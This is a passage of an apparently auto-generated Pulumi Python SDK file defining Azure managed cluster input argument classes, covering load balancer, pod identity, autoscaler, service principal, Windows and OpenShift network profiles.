return pulumi.get(self, "public_ip_prefixes")
@public_ip_prefixes.setter
def public_ip_prefixes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]]]):
pulumi.set(self, "public_ip_prefixes", value)
@pulumi.input_type
class ManagedClusterLoadBalancerProfileOutboundIPsArgs:
def __init__(__self__, *,
public_ips: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]]] = None):
"""
Desired outbound IP resources for the cluster load balancer.
:param pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]] public_ips: A list of public IP resources.
"""
if public_ips is not None:
pulumi.set(__self__, "public_ips", public_ips)
@property
@pulumi.getter(name="publicIPs")
def public_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]]]:
"""
A list of public IP resources.
"""
return pulumi.get(self, "public_ips")
@public_ips.setter
def public_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]]]):
pulumi.set(self, "public_ips", value)
@pulumi.input_type
class ManagedClusterLoadBalancerProfileArgs:
def __init__(__self__, *,
allocated_outbound_ports: Optional[pulumi.Input[int]] = None,
effective_outbound_ips: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]]] = None,
idle_timeout_in_minutes: Optional[pulumi.Input[int]] = None,
managed_outbound_ips: Optional[pulumi.Input['ManagedClusterLoadBalancerProfileManagedOutboundIPsArgs']] = None,
outbound_ip_prefixes: Optional[pulumi.Input['ManagedClusterLoadBalancerProfileOutboundIPPrefixesArgs']] = None,
outbound_ips: Optional[pulumi.Input['ManagedClusterLoadBalancerProfileOutboundIPsArgs']] = None):
"""
Profile of the managed cluster load balancer.
:param pulumi.Input[int] allocated_outbound_ports: Desired number of allocated SNAT ports per VM. Allowed values must be in the range of 0 to 64000 (inclusive). The default value is 0 which results in Azure dynamically allocating ports.
:param pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]] effective_outbound_ips: The effective outbound IP resources of the cluster load balancer.
:param pulumi.Input[int] idle_timeout_in_minutes: Desired outbound flow idle timeout in minutes. Allowed values must be in the range of 4 to 120 (inclusive). The default value is 30 minutes.
:param pulumi.Input['ManagedClusterLoadBalancerProfileManagedOutboundIPsArgs'] managed_outbound_ips: Desired managed outbound IPs for the cluster load balancer.
:param pulumi.Input['ManagedClusterLoadBalancerProfileOutboundIPPrefixesArgs'] outbound_ip_prefixes: Desired outbound IP Prefix resources for the cluster load balancer.
:param pulumi.Input['ManagedClusterLoadBalancerProfileOutboundIPsArgs'] outbound_ips: Desired outbound IP resources for the cluster load balancer.
"""
if allocated_outbound_ports is None:
allocated_outbound_ports = 0
if allocated_outbound_ports is not None:
pulumi.set(__self__, "allocated_outbound_ports", allocated_outbound_ports)
if effective_outbound_ips is not None:
pulumi.set(__self__, "effective_outbound_ips", effective_outbound_ips)
if idle_timeout_in_minutes is None:
idle_timeout_in_minutes = 30
if idle_timeout_in_minutes is not None:
pulumi.set(__self__, "idle_timeout_in_minutes", idle_timeout_in_minutes)
if managed_outbound_ips is not None:
pulumi.set(__self__, "managed_outbound_ips", managed_outbound_ips)
if outbound_ip_prefixes is not None:
pulumi.set(__self__, "outbound_ip_prefixes", outbound_ip_prefixes)
if outbound_ips is not None:
pulumi.set(__self__, "outbound_ips", outbound_ips)
@property
@pulumi.getter(name="allocatedOutboundPorts")
def allocated_outbound_ports(self) -> Optional[pulumi.Input[int]]:
"""
Desired number of allocated SNAT ports per VM. Allowed values must be in the range of 0 to 64000 (inclusive). The default value is 0 which results in Azure dynamically allocating ports.
"""
return pulumi.get(self, "allocated_outbound_ports")
@allocated_outbound_ports.setter
def allocated_outbound_ports(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "allocated_outbound_ports", value)
@property
@pulumi.getter(name="effectiveOutboundIPs")
def effective_outbound_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]]]:
"""
The effective outbound IP resources of the cluster load balancer.
"""
return pulumi.get(self, "effective_outbound_ips")
@effective_outbound_ips.setter
def effective_outbound_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]]]):
pulumi.set(self, "effective_outbound_ips", value)
@property
@pulumi.getter(name="idleTimeoutInMinutes")
def idle_timeout_in_minutes(self) -> Optional[pulumi.Input[int]]:
"""
Desired outbound flow idle timeout in minutes. Allowed values must be in the range of 4 to 120 (inclusive). The default value is 30 minutes.
"""
return pulumi.get(self, "idle_timeout_in_minutes")
@idle_timeout_in_minutes.setter
def idle_timeout_in_minutes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "idle_timeout_in_minutes", value)
@property
@pulumi.getter(name="managedOutboundIPs")
def managed_outbound_ips(self) -> Optional[pulumi.Input['ManagedClusterLoadBalancerProfileManagedOutboundIPsArgs']]:
"""
Desired managed outbound IPs for the cluster load balancer.
"""
return pulumi.get(self, "managed_outbound_ips")
@managed_outbound_ips.setter
def managed_outbound_ips(self, value: Optional[pulumi.Input['ManagedClusterLoadBalancerProfileManagedOutboundIPsArgs']]):
pulumi.set(self, "managed_outbound_ips", value)
@property
@pulumi.getter(name="outboundIPPrefixes")
def outbound_ip_prefixes(self) -> Optional[pulumi.Input['ManagedClusterLoadBalancerProfileOutboundIPPrefixesArgs']]:
"""
Desired outbound IP Prefix resources for the cluster load balancer.
"""
return pulumi.get(self, "outbound_ip_prefixes")
@outbound_ip_prefixes.setter
def outbound_ip_prefixes(self, value: Optional[pulumi.Input['ManagedClusterLoadBalancerProfileOutboundIPPrefixesArgs']]):
pulumi.set(self, "outbound_ip_prefixes", value)
@property
@pulumi.getter(name="outboundIPs")
def outbound_ips(self) -> Optional[pulumi.Input['ManagedClusterLoadBalancerProfileOutboundIPsArgs']]:
"""
Desired outbound IP resources for the cluster load balancer.
"""
return pulumi.get(self, "outbound_ips")
@outbound_ips.setter
def outbound_ips(self, value: Optional[pulumi.Input['ManagedClusterLoadBalancerProfileOutboundIPsArgs']]):
pulumi.set(self, "outbound_ips", value)
@pulumi.input_type
class ManagedClusterPodIdentityExceptionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
namespace: pulumi.Input[str],
pod_labels: pulumi.Input[Mapping[str, pulumi.Input[str]]]):
"""
:param pulumi.Input[str] name: Name of the pod identity exception.
:param pulumi.Input[str] namespace: Namespace of the pod identity exception.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] pod_labels: Pod labels to match.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "namespace", namespace)
pulumi.set(__self__, "pod_labels", pod_labels)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Name of the pod identity exception.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
"""
Namespace of the pod identity exception.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter(name="podLabels")
def pod_labels(self) -> pulumi.Input[Mapping[str, pulumi.Input[str]]]:
"""
Pod labels to match.
"""
return pulumi.get(self, "pod_labels")
@pod_labels.setter
def pod_labels(self, value: pulumi.Input[Mapping[str, pulumi.Input[str]]]):
pulumi.set(self, "pod_labels", value)
@pulumi.input_type
class ManagedClusterPodIdentityProfileArgs:
def __init__(__self__, *,
allow_network_plugin_kubenet: Optional[pulumi.Input[bool]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
user_assigned_identities: Optional[pulumi.Input[Sequence[pulumi.Input['ManagedClusterPodIdentityArgs']]]] = None,
user_assigned_identity_exceptions: Optional[pulumi.Input[Sequence[pulumi.Input['ManagedClusterPodIdentityExceptionArgs']]]] = None):
"""
:param pulumi.Input[bool] allow_network_plugin_kubenet: Customer consent for enabling AAD pod identity addon in cluster using Kubenet network plugin.
:param pulumi.Input[bool] enabled: Whether the pod identity addon is enabled.
:param pulumi.Input[Sequence[pulumi.Input['ManagedClusterPodIdentityArgs']]] user_assigned_identities: User assigned pod identity settings.
:param pulumi.Input[Sequence[pulumi.Input['ManagedClusterPodIdentityExceptionArgs']]] user_assigned_identity_exceptions: User assigned pod identity exception settings.
"""
if allow_network_plugin_kubenet is not None:
pulumi.set(__self__, "allow_network_plugin_kubenet", allow_network_plugin_kubenet)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if user_assigned_identities is not None:
pulumi.set(__self__, "user_assigned_identities", user_assigned_identities)
if user_assigned_identity_exceptions is not None:
pulumi.set(__self__, "user_assigned_identity_exceptions", user_assigned_identity_exceptions)
@property
@pulumi.getter(name="allowNetworkPluginKubenet")
def allow_network_plugin_kubenet(self) -> Optional[pulumi.Input[bool]]:
"""
Customer consent for enabling AAD pod identity addon in cluster using Kubenet network plugin.
"""
return pulumi.get(self, "allow_network_plugin_kubenet")
@allow_network_plugin_kubenet.setter
def allow_network_plugin_kubenet(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "allow_network_plugin_kubenet", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the pod identity addon is enabled.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="userAssignedIdentities")
def user_assigned_identities(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ManagedClusterPodIdentityArgs']]]]:
"""
User assigned pod identity settings.
"""
return pulumi.get(self, "user_assigned_identities")
@user_assigned_identities.setter
def user_assigned_identities(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ManagedClusterPodIdentityArgs']]]]):
pulumi.set(self, "user_assigned_identities", value)
@property
@pulumi.getter(name="userAssignedIdentityExceptions")
def user_assigned_identity_exceptions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ManagedClusterPodIdentityExceptionArgs']]]]:
"""
User assigned pod identity exception settings.
"""
return pulumi.get(self, "user_assigned_identity_exceptions")
@user_assigned_identity_exceptions.setter
def user_assigned_identity_exceptions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ManagedClusterPodIdentityExceptionArgs']]]]):
pulumi.set(self, "user_assigned_identity_exceptions", value)
@pulumi.input_type
class ManagedClusterPodIdentityArgs:
def __init__(__self__, *,
identity: pulumi.Input['UserAssignedIdentityArgs'],
name: pulumi.Input[str],
namespace: pulumi.Input[str],
binding_selector: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input['UserAssignedIdentityArgs'] identity: Information of the user assigned identity.
:param pulumi.Input[str] name: Name of the pod identity.
:param pulumi.Input[str] namespace: Namespace of the pod identity.
:param pulumi.Input[str] binding_selector: Binding selector to use for the AzureIdentityBinding resource.
"""
pulumi.set(__self__, "identity", identity)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "namespace", namespace)
if binding_selector is not None:
pulumi.set(__self__, "binding_selector", binding_selector)
@property
@pulumi.getter
def identity(self) -> pulumi.Input['UserAssignedIdentityArgs']:
"""
Information of the user assigned identity.
"""
return pulumi.get(self, "identity")
@identity.setter
def identity(self, value: pulumi.Input['UserAssignedIdentityArgs']):
pulumi.set(self, "identity", value)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Name of the pod identity.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
"""
Namespace of the pod identity.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter(name="bindingSelector")
def binding_selector(self) -> Optional[pulumi.Input[str]]:
"""
Binding selector to use for the AzureIdentityBinding resource.
"""
return pulumi.get(self, "binding_selector")
@binding_selector.setter
def binding_selector(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "binding_selector", value)
@pulumi.input_type
class ManagedClusterPropertiesAutoScalerProfileArgs:
def __init__(__self__, *,
balance_similar_node_groups: Optional[pulumi.Input[str]] = None,
expander: Optional[pulumi.Input[Union[str, 'Expander']]] = None,
max_empty_bulk_delete: Optional[pulumi.Input[str]] = None,
max_graceful_termination_sec: Optional[pulumi.Input[str]] = None,
max_node_provision_time: Optional[pulumi.Input[str]] = None,
max_total_unready_percentage: Optional[pulumi.Input[str]] = None,
new_pod_scale_up_delay: Optional[pulumi.Input[str]] = None,
ok_total_unready_count: Optional[pulumi.Input[str]] = None,
scale_down_delay_after_add: Optional[pulumi.Input[str]] = None,
scale_down_delay_after_delete: Optional[pulumi.Input[str]] = None,
scale_down_delay_after_failure: Optional[pulumi.Input[str]] = None,
scale_down_unneeded_time: Optional[pulumi.Input[str]] = None,
scale_down_unready_time: Optional[pulumi.Input[str]] = None,
scale_down_utilization_threshold: Optional[pulumi.Input[str]] = None,
scan_interval: Optional[pulumi.Input[str]] = None,
skip_nodes_with_local_storage: Optional[pulumi.Input[str]] = None,
skip_nodes_with_system_pods: Optional[pulumi.Input[str]] = None):
"""
Parameters to be applied to the cluster-autoscaler when enabled
"""
if balance_similar_node_groups is not None:
pulumi.set(__self__, "balance_similar_node_groups", balance_similar_node_groups)
if expander is not None:
pulumi.set(__self__, "expander", expander)
if max_empty_bulk_delete is not None:
pulumi.set(__self__, "max_empty_bulk_delete", max_empty_bulk_delete)
if max_graceful_termination_sec is not None:
pulumi.set(__self__, "max_graceful_termination_sec", max_graceful_termination_sec)
if max_node_provision_time is not None:
pulumi.set(__self__, "max_node_provision_time", max_node_provision_time)
if max_total_unready_percentage is not None:
pulumi.set(__self__, "max_total_unready_percentage", max_total_unready_percentage)
if new_pod_scale_up_delay is not None:
pulumi.set(__self__, "new_pod_scale_up_delay", new_pod_scale_up_delay)
if ok_total_unready_count is not None:
pulumi.set(__self__, "ok_total_unready_count", ok_total_unready_count)
if scale_down_delay_after_add is not None:
pulumi.set(__self__, "scale_down_delay_after_add", scale_down_delay_after_add)
if scale_down_delay_after_delete is not None:
pulumi.set(__self__, "scale_down_delay_after_delete", scale_down_delay_after_delete)
if scale_down_delay_after_failure is not None:
pulumi.set(__self__, "scale_down_delay_after_failure", scale_down_delay_after_failure)
if scale_down_unneeded_time is not None:
pulumi.set(__self__, "scale_down_unneeded_time", scale_down_unneeded_time)
if scale_down_unready_time is not None:
pulumi.set(__self__, "scale_down_unready_time", scale_down_unready_time)
if scale_down_utilization_threshold is not None:
pulumi.set(__self__, "scale_down_utilization_threshold", scale_down_utilization_threshold)
if scan_interval is not None:
pulumi.set(__self__, "scan_interval", scan_interval)
if skip_nodes_with_local_storage is not None:
pulumi.set(__self__, "skip_nodes_with_local_storage", skip_nodes_with_local_storage)
if skip_nodes_with_system_pods is not None:
pulumi.set(__self__, "skip_nodes_with_system_pods", skip_nodes_with_system_pods)
@property
@pulumi.getter(name="balanceSimilarNodeGroups")
def balance_similar_node_groups(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "balance_similar_node_groups")
@balance_similar_node_groups.setter
def balance_similar_node_groups(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "balance_similar_node_groups", value)
@property
@pulumi.getter
def expander(self) -> Optional[pulumi.Input[Union[str, 'Expander']]]:
return pulumi.get(self, "expander")
@expander.setter
def expander(self, value: Optional[pulumi.Input[Union[str, 'Expander']]]):
pulumi.set(self, "expander", value)
@property
@pulumi.getter(name="maxEmptyBulkDelete")
def max_empty_bulk_delete(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "max_empty_bulk_delete")
@max_empty_bulk_delete.setter
def max_empty_bulk_delete(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "max_empty_bulk_delete", value)
@property
@pulumi.getter(name="maxGracefulTerminationSec")
def max_graceful_termination_sec(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "max_graceful_termination_sec")
@max_graceful_termination_sec.setter
def max_graceful_termination_sec(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "max_graceful_termination_sec", value)
@property
@pulumi.getter(name="maxNodeProvisionTime")
def max_node_provision_time(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "max_node_provision_time")
@max_node_provision_time.setter
def max_node_provision_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "max_node_provision_time", value)
@property
@pulumi.getter(name="maxTotalUnreadyPercentage")
def max_total_unready_percentage(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "max_total_unready_percentage")
@max_total_unready_percentage.setter
def max_total_unready_percentage(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "max_total_unready_percentage", value)
@property
@pulumi.getter(name="newPodScaleUpDelay")
def new_pod_scale_up_delay(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "new_pod_scale_up_delay")
@new_pod_scale_up_delay.setter
def new_pod_scale_up_delay(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "new_pod_scale_up_delay", value)
@property
@pulumi.getter(name="okTotalUnreadyCount")
def ok_total_unready_count(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "ok_total_unready_count")
@ok_total_unready_count.setter
def ok_total_unready_count(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ok_total_unready_count", value)
@property
@pulumi.getter(name="scaleDownDelayAfterAdd")
def scale_down_delay_after_add(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "scale_down_delay_after_add")
@scale_down_delay_after_add.setter
def scale_down_delay_after_add(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scale_down_delay_after_add", value)
@property
@pulumi.getter(name="scaleDownDelayAfterDelete")
def scale_down_delay_after_delete(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "scale_down_delay_after_delete")
@scale_down_delay_after_delete.setter
def scale_down_delay_after_delete(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scale_down_delay_after_delete", value)
@property
@pulumi.getter(name="scaleDownDelayAfterFailure")
def scale_down_delay_after_failure(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "scale_down_delay_after_failure")
@scale_down_delay_after_failure.setter
def scale_down_delay_after_failure(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scale_down_delay_after_failure", value)
@property
@pulumi.getter(name="scaleDownUnneededTime")
def scale_down_unneeded_time(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "scale_down_unneeded_time")
@scale_down_unneeded_time.setter
def scale_down_unneeded_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scale_down_unneeded_time", value)
@property
@pulumi.getter(name="scaleDownUnreadyTime")
def scale_down_unready_time(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "scale_down_unready_time")
@scale_down_unready_time.setter
def scale_down_unready_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scale_down_unready_time", value)
@property
@pulumi.getter(name="scaleDownUtilizationThreshold")
def scale_down_utilization_threshold(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "scale_down_utilization_threshold")
@scale_down_utilization_threshold.setter
def scale_down_utilization_threshold(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scale_down_utilization_threshold", value)
@property
@pulumi.getter(name="scanInterval")
def scan_interval(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "scan_interval")
@scan_interval.setter
def scan_interval(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scan_interval", value)
@property
@pulumi.getter(name="skipNodesWithLocalStorage")
def skip_nodes_with_local_storage(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "skip_nodes_with_local_storage")
@skip_nodes_with_local_storage.setter
def skip_nodes_with_local_storage(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "skip_nodes_with_local_storage", value)
@property
@pulumi.getter(name="skipNodesWithSystemPods")
def skip_nodes_with_system_pods(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "skip_nodes_with_system_pods")
@skip_nodes_with_system_pods.setter
def skip_nodes_with_system_pods(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "skip_nodes_with_system_pods", value)
@pulumi.input_type
class ManagedClusterPropertiesIdentityProfileArgs:
def __init__(__self__, *,
client_id: Optional[pulumi.Input[str]] = None,
object_id: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] client_id: The client id of the user assigned identity.
:param pulumi.Input[str] object_id: The object id of the user assigned identity.
:param pulumi.Input[str] resource_id: The resource id of the user assigned identity.
"""
if client_id is not None:
pulumi.set(__self__, "client_id", client_id)
if object_id is not None:
pulumi.set(__self__, "object_id", object_id)
if resource_id is not None:
pulumi.set(__self__, "resource_id", resource_id)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Optional[pulumi.Input[str]]:
"""
The client id of the user assigned identity.
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter(name="objectId")
def object_id(self) -> Optional[pulumi.Input[str]]:
"""
The object id of the user assigned identity.
"""
return pulumi.get(self, "object_id")
@object_id.setter
def object_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "object_id", value)
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> Optional[pulumi.Input[str]]:
"""
The resource id of the user assigned identity.
"""
return pulumi.get(self, "resource_id")
@resource_id.setter
def resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_id", value)
@pulumi.input_type
class ManagedClusterSKUArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[Union[str, 'ManagedClusterSKUName']]] = None,
tier: Optional[pulumi.Input[Union[str, 'ManagedClusterSKUTier']]] = None):
"""
:param pulumi.Input[Union[str, 'ManagedClusterSKUName']] name: Name of a managed cluster SKU.
:param pulumi.Input[Union[str, 'ManagedClusterSKUTier']] tier: Tier of a managed cluster SKU.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if tier is not None:
pulumi.set(__self__, "tier", tier)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[Union[str, 'ManagedClusterSKUName']]]:
"""
Name of a managed cluster SKU.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[Union[str, 'ManagedClusterSKUName']]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def tier(self) -> Optional[pulumi.Input[Union[str, 'ManagedClusterSKUTier']]]:
"""
Tier of a managed cluster SKU.
"""
return pulumi.get(self, "tier")
@tier.setter
def tier(self, value: Optional[pulumi.Input[Union[str, 'ManagedClusterSKUTier']]]):
pulumi.set(self, "tier", value)
@pulumi.input_type
class ManagedClusterServicePrincipalProfileArgs:
def __init__(__self__, *,
client_id: pulumi.Input[str],
secret: Optional[pulumi.Input[str]] = None):
"""
Information about a service principal identity for the cluster to use for manipulating Azure APIs.
:param pulumi.Input[str] client_id: The ID for the service principal.
:param pulumi.Input[str] secret: The secret password associated with the service principal in plain text.
"""
pulumi.set(__self__, "client_id", client_id)
if secret is not None:
pulumi.set(__self__, "secret", secret)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> pulumi.Input[str]:
"""
The ID for the service principal.
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: pulumi.Input[str]):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter
def secret(self) -> Optional[pulumi.Input[str]]:
"""
The secret password associated with the service principal in plain text.
"""
return pulumi.get(self, "secret")
@secret.setter
def secret(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "secret", value)
@pulumi.input_type
class ManagedClusterWindowsProfileArgs:
def __init__(__self__, *,
admin_username: pulumi.Input[str],
admin_password: Optional[pulumi.Input[str]] = None,
enable_csi_proxy: Optional[pulumi.Input[bool]] = None,
license_type: Optional[pulumi.Input[Union[str, 'LicenseType']]] = None):
"""
Profile for Windows VMs in the container service cluster.
:param pulumi.Input[str] admin_username: Specifies the name of the administrator account. <br><br> **restriction:** Cannot end in "." <br><br> **Disallowed values:** "administrator", "admin", "user", "user1", "test", "user2", "test1", "user3", "admin1", "1", "123", "a", "actuser", "adm", "admin2", "aspnet", "backup", "console", "david", "guest", "john", "owner", "root", "server", "sql", "support", "support_388945a0", "sys", "test2", "test3", "user4", "user5". <br><br> **Minimum-length:** 1 character <br><br> **Max-length:** 20 characters
:param pulumi.Input[str] admin_password: Specifies the password of the administrator account. <br><br> **Minimum-length:** 8 characters <br><br> **Max-length:** 123 characters <br><br> **Complexity requirements:** 3 out of 4 conditions below need to be fulfilled <br> Has lower characters <br>Has upper characters <br> Has a digit <br> Has a special character (Regex match [\W_]) <br><br> **Disallowed values:** "abc@123", "P@$$w0rd", "P@ssw0rd", "P@ssword123", "Pa$$word", "pass@word1", "Password!", "Password1", "Password22", "iloveyou!"
:param pulumi.Input[bool] enable_csi_proxy: Whether to enable CSI proxy.
:param pulumi.Input[Union[str, 'LicenseType']] license_type: The licenseType to use for Windows VMs. Windows_Server is used to enable Azure Hybrid User Benefits for Windows VMs.
"""
pulumi.set(__self__, "admin_username", admin_username)
if admin_password is not None:
pulumi.set(__self__, "admin_password", admin_password)
if enable_csi_proxy is not None:
pulumi.set(__self__, "enable_csi_proxy", enable_csi_proxy)
if license_type is not None:
pulumi.set(__self__, "license_type", license_type)
@property
@pulumi.getter(name="adminUsername")
def admin_username(self) -> pulumi.Input[str]:
"""
Specifies the name of the administrator account. <br><br> **restriction:** Cannot end in "." <br><br> **Disallowed values:** "administrator", "admin", "user", "user1", "test", "user2", "test1", "user3", "admin1", "1", "123", "a", "actuser", "adm", "admin2", "aspnet", "backup", "console", "david", "guest", "john", "owner", "root", "server", "sql", "support", "support_388945a0", "sys", "test2", "test3", "user4", "user5". <br><br> **Minimum-length:** 1 character <br><br> **Max-length:** 20 characters
"""
return pulumi.get(self, "admin_username")
@admin_username.setter
def admin_username(self, value: pulumi.Input[str]):
pulumi.set(self, "admin_username", value)
@property
@pulumi.getter(name="adminPassword")
def admin_password(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the password of the administrator account. <br><br> **Minimum-length:** 8 characters <br><br> **Max-length:** 123 characters <br><br> **Complexity requirements:** 3 out of 4 conditions below need to be fulfilled <br> Has lower characters <br>Has upper characters <br> Has a digit <br> Has a special character (Regex match [\W_]) <br><br> **Disallowed values:** "abc@123", "P@$$w0rd", "P@ssw0rd", "P@ssword123", "Pa$$word", "pass@word1", "Password!", "Password1", "Password22", "iloveyou!"
"""
return pulumi.get(self, "admin_password")
@admin_password.setter
def admin_password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "admin_password", value)
@property
@pulumi.getter(name="enableCSIProxy")
def enable_csi_proxy(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to enable CSI proxy.
"""
return pulumi.get(self, "enable_csi_proxy")
@enable_csi_proxy.setter
def enable_csi_proxy(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_csi_proxy", value)
@property
@pulumi.getter(name="licenseType")
def license_type(self) -> Optional[pulumi.Input[Union[str, 'LicenseType']]]:
"""
The licenseType to use for Windows VMs. Windows_Server is used to enable Azure Hybrid User Benefits for Windows VMs.
"""
return pulumi.get(self, "license_type")
@license_type.setter
def license_type(self, value: Optional[pulumi.Input[Union[str, 'LicenseType']]]):
pulumi.set(self, "license_type", value)
@pulumi.input_type
class NetworkProfileArgs:
def __init__(__self__, *,
peer_vnet_id: Optional[pulumi.Input[str]] = None,
vnet_cidr: Optional[pulumi.Input[str]] = None,
vnet_id: Optional[pulumi.Input[str]] = None):
"""
Represents the OpenShift networking configuration
:param pulumi.Input[str] peer_vnet_id: CIDR of the Vnet to peer.
:param pulumi.Input[str] vnet_cidr: CIDR for the OpenShift Vnet.
:param pulumi.Input[str] vnet_id: ID of the Vnet created for OSA cluster.
"""
if peer_vnet_id is not None:
pulumi.set(__self__, "peer_vnet_id", peer_vnet_id)
if vnet_cidr is None:
vnet_cidr = '10.0.0.0/8'
if vnet_cidr is not None:
pulumi.set(__self__, "vnet_cidr", vnet_cidr)
if vnet_id is not None:
pulumi.set(__self__, "vnet_id", vnet_id)
@property
@pulumi.getter(name="peerVnetId")
def peer_vnet_id(self) -> Optional[pulumi.Input[str]]:
"""
CIDR of the Vnet to peer.
"""
return pulumi.get(self, "peer_vnet_id")
@peer_vnet_id.setter
def peer_vnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "peer_vnet_id", value)
@property
@pulumi.getter(name="vnetCidr")
def vnet_cidr(self) -> Optional[pulumi.Input[str]]:
"""
CIDR for the OpenShift Vnet.
"""
return pulumi.get(self, "vnet_cidr")
@vnet_cidr.setter
def vnet_cidr(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vnet_cidr", value)
@property
@pulumi.getter(name="vnetId")
def vnet_id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the Vnet created for OSA cluster.
"""
return pulumi.get(self, "vnet_id")
@vnet_id.setter
def vnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vnet_id", value)
@pulumi.input_type
class OpenShiftManagedClusterAADIdentityProviderArgs:
def __init__(__self__, *,
kind: pulumi.Input[str],
client_id: Optional[pulumi.Input[str]] = None,
customer_admin_group_id: Optional[pulumi.Input[str]] = None,
secret: Optional[pulumi.Input[str]] = None,
tenant_id: Optional[pulumi.Input[str]] = None):
"""
Defines the Identity provider for MS AAD.
:param pulumi.Input[str] kind: The kind of the provider.
Expected value is 'AADIdentityProvider'.
:param pulumi.Input[str] client_id: The clientId password associated with the provider.
:param pulumi.Input[str] customer_admin_group_id: The groupId to be granted cluster admin role.
